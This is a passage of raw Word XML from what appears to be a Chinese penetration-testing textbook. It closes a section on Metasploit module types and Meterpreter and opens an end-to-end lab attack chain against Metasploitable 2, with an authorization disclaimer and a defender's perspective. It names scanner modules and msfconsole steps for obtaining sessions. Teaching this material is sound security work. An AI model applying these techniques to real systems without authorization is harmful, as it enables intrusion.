          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流程，为一处已知的服务漏洞找到并配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块以获取会话。将你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交互过程记录下来，特别注意不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项给你带来的会话体验有何不同。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="307"/>
    <w:bookmarkStart w:id="308" w:name="小结-20"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心思想是将攻击过程解耦为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit、Payload、Encoder、Auxiliary、Post</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等标准化模块，实现了攻击代码的极高可复用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">负责触发漏洞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是在漏洞触发后执行的代码，其核心分类是体积受限的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Staged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和完全自包含的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stageless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一种先进的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">体系，其通过纯内存运行、进程注入和动态扩展，提供了功能强大的加密远程控制平台。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权测试的标准流程包括：搜索模块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加载并设置目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无害化检查（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架的防御依赖于纵深策略：通过补丁和最小化攻击面消除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础，通过网络流量和主机行为异常检测来发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的活动。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="308"/>
    <w:bookmarkStart w:id="309" w:name="延伸阅读-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Unleashed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OffSec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">维护的官方免费课程）：深入学习</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有模块类型和开发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kennedy, D. et al. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit: The Penetration Tester’s Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：结合真实渗透测试场景详解框架应用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide：搜索“OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide”获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全测试的标准方法论，有助于理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Auxiliary/Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试中的应用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵中查阅与“命令行与控制”（C2）和“防御规避”，理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中的映射，是蓝队检测的必备知识。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="309"/>
    <w:bookmarkStart w:id="310" w:name="完整链路载荷检测防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完整链路·载荷检测防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="310"/>
    <w:bookmarkStart w:id="311" w:name="攻击链整合作战从扫描到基础后渗透的端到端实操"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击链整合作战：从扫描到基础后渗透的端到端实操</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（强制，本节）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作仅限读者在自建隔离实验网络中对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列（Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2/3）或已获书面授权的靶机执行。实验网络必须与生产网络及互联网物理或逻辑隔离。任何未经授权对他人系统使用本节所述技术均属违法行为，可能导致严重的法律后果。作者与出版社不承担任何因误用或滥用本书内容而产生的法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在进入本节完整链路实操前，读者应已掌握以下前置知识：馆藏《从位到物联》第5章（Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描原理与端口状态）、第24–27章（TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈与网络通信模型）、第28章（防火墙与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础）；本书第2章（靶场搭建）、第5章（扫描与漏洞评估方法论）、第17.1节（Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块体系与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">概念）。本节不再重复讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">握手、端口扫描原理或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">界面基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角（动机）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在完成信息收集与漏洞识别后，攻击者的核心诉求是将零散的知识片段迅速转化为对目标系统的实际控制。Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架的价值正在于此：它将“漏洞触发—载荷投递—会话建立—后渗透操作”整合为一条可复现、可审计的标准化流水线。通过单一控制台完成从初始扫描到获得交互式会话的全过程，能够最大限度地减少工具切换带来的操作摩擦和错误概率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角（动机）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队同样需要深入理解这条完整攻击链的每一个环节，因为检测机会平等地存在于杀伤链的所有阶段。从扫描探测的异常流量模式、漏洞利用时的畸形请求，到载荷投递阶段的网络行为突变和后续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C2（Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Control，命令与控制）通信的心跳特征——每一步都可能暴露攻击者的存在。掌握攻击链全貌，是蓝队从被动响应转向主动威胁猎杀（threat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hunting）的根本前提。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机（承上启下）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第17.1节将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解构为一套可组合的模块体系，并详细剖析了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit、Payload、Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等核心概念。本节将在此基础上，把第5章的扫描发现与第17.1节的模块选择、会话管理串联为一条端到端的完整攻击链，以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为靶机演示“扫描→选模块→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> getshell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">→基础后渗透”的全流程。随后，本节将秉持攻防对称原则，系统阐述蓝队如何在此链路的每个关键节点部署检测与防御措施。最后，通过习题与靶机迁移任务，帮助读者内化框架使用技能，并能在不同环境中灵活外推。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">完整链路的逻辑架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中，从零到完整控制的攻击链可以抽象为五个阶段的序列化流水线。它并非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的专有设计，而是对通用攻击杀伤链（Cyber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain）的工程化实现，其逻辑映射关系如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段一：侦察与信息收集（Reconnaissance）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——对应杀伤链的“侦察”与“武器化准备”。攻击者在此阶段使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块对目标进行端口扫描（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、服务版本探测（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/smb/smb_version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）和漏洞存在性验证（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/http/ssl_version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。这些模块的输出直接决定了后续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块的选择。这一阶段的本质是将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等独立扫描工具的发现结果转化为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架内部可查询、可引用的结构化数据（通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导入或直接使用框架内扫描模块）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段二：漏洞利用模块匹配（Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Selection）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——攻击者根据侦察获得的服务指纹，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令通过服务名、CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编号或关键词定位候选</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
